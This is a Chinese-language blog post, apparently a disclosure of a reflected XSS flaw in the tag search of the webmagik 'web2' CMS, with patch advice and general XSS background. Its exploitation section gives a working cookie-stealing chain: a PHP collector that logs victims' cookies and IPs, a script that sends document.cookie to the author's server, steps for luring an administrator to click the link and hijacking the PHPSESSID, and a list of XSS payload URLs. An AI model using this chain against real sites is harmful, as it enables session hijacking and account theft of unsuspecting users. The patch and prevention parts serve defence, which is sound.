xss漏洞发现及利用
来源:互联网 发布:淘宝精品宝贝采集神器 编辑:程序博客网 时间:2024/05/16 06:39
漏洞描述:在使用标签(tag)进行浏览时,由于没有很好的过滤用户输入(tag关键字)造成xss跨站漏洞,用户自定义的版块tag搜索和全局tag搜索列表。
利用形式1:
http://clin003.com/web2/?u=Club_talk_list&tag=<script>alert(111)</script>
其中http://clin003.com/web2/为网站连接,Club_talk_list为用户自定义版块。
利用形式2:
http://clin003.com/web2/?a=list&tag=<script>alert("111")</script>
其中http://clin003.com/web2/为网站连接,这个就是所谓的全局tag搜索。
漏洞危害:欺骗用户点击假冒连接盗取访问者的cookies甚至可能危害到访问者电脑安全,涉及帐户的相关信息可能被盗取。
漏洞发现者:clin003
已向官方报告漏洞情况。请wm使用者关注官方修补办法。
官方修补办法地址: http://webmagik.cn/bbs/viewthread.php?tid=638&pid=2225
CODE:
1 下载 module_list.php (2.83 KB)
并上传覆盖 /meta/module/module_list.php 后台重新生成各模块代码即可。
2 不想重新手工生成代码的,可以直接修改对应的 /umod/XXX_list.php 在页面最上方添加 $_REQUEST[tag] = strip_tags($_REQUEST[tag]);
Added By Easy
——————————————————————
临时解决办法:
在所有涉及到tag搜索的页面 添加一行代码.
[Copy to clipboard] [ - ]
CODE:
$_REQUEST[tag] = strip_tags($_REQUEST[tag]);
官方在下一个版本会把过滤加进去。顺便说下,在模块基本设定中,如果开启不过滤数据,用户添加的内容也可以存在此问题。
----------------------------------
补充下:
在list.php(/mod/list.php)第二十四行的位置回车加上
$_REQUEST[tag] = strip_tags($_REQUEST[tag]);
这个是全局搜索tag的地方更新模块的时候不会被更新。
——————————————————————
漏洞发现过程:
在寻找使用过的中文标签为什么会失效的答案。添加一篇文章,然后由于想把“中间带空格的标签”合起来而使用啦单引号比如:‘webmagik 跨站’,提交的时候就出现问题。一堆数据库错误信息!!
怀疑有注入漏洞,,经多次检测没有注入漏洞。
忽然想到检测下跨站的这个xss代码(上次已经检测过搜索框的iframe跨站漏洞,只是没公布)。
--------------------------------------------------
下边是介绍xss漏洞的常识
----------------------------------------------------
什么是跨站脚本(CSS/XSS)?
在Web站点未经适当过滤便显示在HTML页面上时会出现这种漏洞。它允许(由用户输入的)任意HTML显示在用户的浏览器中。
我 们所说跨站脚本是指在远程WEB页面的html代码中插入的具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被 解释执行,有时候跨站脚本被称为"XSS",这是因为"CSS"一般被称为分层样式表,这很容易让人困惑,如果你听某人提到CSS或者XSS安全漏洞,通 常指得是跨站脚本。跨站脚本漏洞常常被称为XSS漏洞。
XSS和脚本注射的区别?
原文里作者是和他一个朋友(b0iler)讨论后,才明白并非任何可利用脚本插入实现攻击的
漏洞都被称为XSS,还有另一种攻击方式:"Script Injection",他们的区别在以下两点:
1.(Script Injection)脚本插入攻击会把我们插入的脚本保存在被修改的远程WEB页面里,如
:sql injection,XPath injection.
2.跨站脚本是临时的,执行后就消失了
什么类型的脚本可以被插入远程页面?
主流脚本包括以下几种:
HTML
JavaScript (本文讨论)
VBScript
ActiveX
Flash
测试代码:
1,在自己服务器上建立如下文件:
Getcookie.php
<?php
$cookie = $_GET[c];
$ip = getenv (REMOTE_ADDR);
$time=date("j F, Y, g:i a");
$referer=getenv (HTTP_REFERER);
$fp = fopen(victim.htm, a);
fwrite($fp, Cookie: .$cookie.<br> IP: .$ip. <br> Date and Time: .$time. <br> Referer: .$referer.<br><br><br>);
fclose($fp);
?>
Xss.js
document.write(<img src="http://clin003.com/getcookie.php?c=+document.cookie+" width=0 height=0 border=0 />);
2,发送信息给管理员
内容包含下边的连接:
http://clin003.com/web2/?a=list&tag=<img+src="http://clin003.com/getcookie.php?c=+document.cookie+" />_____________一个恶意的开始!!!
改进后的代码:
http://clin003.com/web2/?a=list&tag= <script src=http://clin003.com/xss.js></script>
成功收到cookies
3,等待管理员点击然后检查获得victim.htm内容。
4,复制从PHPSESSID= 到;的内容
启发来源:WEB漏洞挖掘技术
参考漏洞分析格式:PhpNuke管理员密码可泄露问题
link@clin003.com
----------------------------------------------------------------------
相关链接:
XSS:http://wiki.matrix.org.cn/Wiki.jsp?page=XSS
跨站脚本攻击(XSS)FAQ:http://tech.idv2.com/2006/08/30/xss-faq/
也谈跨站脚本攻击与防御:http://www.xfocus.net/articles/200607/874.html
浅析XSS(Cross Site Script)漏洞原:http://www.xker.com/page/e2007/0704/27444_3.html
PHP-Nuke个人消息存在HTML插入漏洞:http://www.xfocus.net/vuls/200208/2970.html
--------------------------------------------------------------------
预防的办法:-----------------------------------------------
1.在你的WEB浏览器上禁用javascript脚本
2..开发者要仔细审核代码,对提交输入数据进行有效检查,如"<"和">"。
可以把"<",">"转换为<,>
注意:由于XSS漏洞可被利用的多样性,程序员自己要明白具体需要过滤的字符,
这主要依赖于所开发程序的作用,建议过滤掉所有元字符,包括"="。
对我们浏览网页的网友来说不要访问包含<script>字符的连接,一些官方的URL不会包括任何脚本元素。
附带---------------------------------------------
到 目前为止,对于跨站点脚本攻击具有很大的威胁这一点大家并无异议。如果您很精通 XSS 并且只想看看有什么好的测试方法可供借鉴,那么请直接跳到本文的测试部分。如果您对此一无所知,请按顺序认真阅读!如果某个怀有恶意的人(攻击者)可以强 迫某个不知情的用户(受害者)运行攻击者选择的客户端脚本,那么便会发生跨站点脚本攻击。“跨站点脚本”这个词应该属于用词不当的情况,因为它不仅与脚本 有关,而且它甚至不一定是跨站点的。所以,它就是一个在发现这种攻击时起的一个名字,并且一直沿用至今。从现在开始,我们将使用它常见的缩写名称 “XSS”。
引用自:测试 Web 应用程序是否存在跨站点脚本漏洞
--------------------------------------下边一些参考资料。
http://clin003.com/web2/?a=list&tag=<script>alert("111")</script>
http://clin003.com/web2/?a=list&tag=<script>alert(111)</script>
http://clin003.com/web2/?a=list&tag=<script>alert(111)</script>
http://clin003.com/web2/?a=list&tag=<body+onload=alert("1111")>
http://clin003.com/web2/?a=list&tag=<body+onload=alert(1111)>
http://clin003.com/web2/?a=list&tag=<body+onload=alert(1111)>
upload/2011/3/201103300326291646.bmp+onload=alert("1111")>
upload/2011/3/201103300326291646.bmp+onload=alert("1111")>
http://clin003.com/web2/?a=list&tag=<img+src="http://clin003.com/getcookie.php?c=+document.cookie+" />_____________一个恶意的开始!!!
upload/2011/3/201103300326291646.bmp+onload=alert(1111)>
upload/2011/3/201103300326291646.bmp+onload=alert(1111)>
http://clin003.com/web2/?a=list&tag=<"
http://clin003.com/web2/?a=list&tag=<
http://clin003.com/web2/?a=list&tag=<
http://clin003.com/web2/?a=list&tag=<!--
http://clin003.com/web2/?a=list&tag=-->
http://clin003.com/web2/?a=list&tag=<!-- -->
以上所有的连接都检测出漏洞
漏洞利用代码:
获得cookie
http://clin003.com/web2/?a=list&tag=%3Cscript%3Ealert(document.cookie)%3C%2fscript%3E
==============================================
什么是跨站脚本(CSS/XSS)?
在Web站点未经适当过滤便显示在HTML页面上时会出现这种漏洞。它允许(由用户输入的)任意HTML显示在用户的浏览器中。
我 们所说跨站脚本是指在远程WEB页面的html代码中插入的具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被 解释执行,有时候跨站脚本被称为"XSS",这是因为"CSS"一般被称为分层样式表,这很容易让人困惑,如果你听某人提到CSS或者XSS安全漏洞,通 常指得是跨站脚本。跨站脚本漏洞常常被
- xss漏洞发现及利用
- xss漏洞发现及利用
- xss漏洞发现及利用
- web2(wm)修改之——xss漏洞发现及利用
- DiscuzX2注入漏洞及XSS漏洞的利用
- XSS漏洞原理及理解
- 从一个漏洞谈到ptrace的漏洞发现及利用方法
- 利用xss漏洞能做什么?
- metasploit利用IE漏洞XSS挂马拿内网主机
- metasploit利用IE漏洞XSS挂马拿内网主机
- 寻找xss漏洞网站并利用
- 利用xss漏洞窃取cookie登录
- 利用窗口引用漏洞和XSS漏洞实现浏览器劫持
- 一款用于发现SSRF、XXE、XSS漏洞的小工具
- XSS漏洞修补及预防--使用过滤器
- XSS漏洞
- XSS漏洞
- 发现一号店首页曝出重大XSS漏洞,在IE8,IE9,IE10上均有此漏洞
- 20世纪合成的灵异旧照(组图)
- Mysql Update语句的详细用法
- 编程也不是那么奇妙.........
- 自己设计并使用断言
- hdu 3549 Flow Problem
- xss漏洞发现及利用
- java-foreach语句使用总结
- 美化你的android程序:自定义ListView背景
- Linux开启FTP(vsftpd)服务
- 反编译dex文件的命令和参数解释
- C文件输入输出之一fopen&fclose
- const 引用
- ZOJ2539
- Android界面开发中的面板控件Tab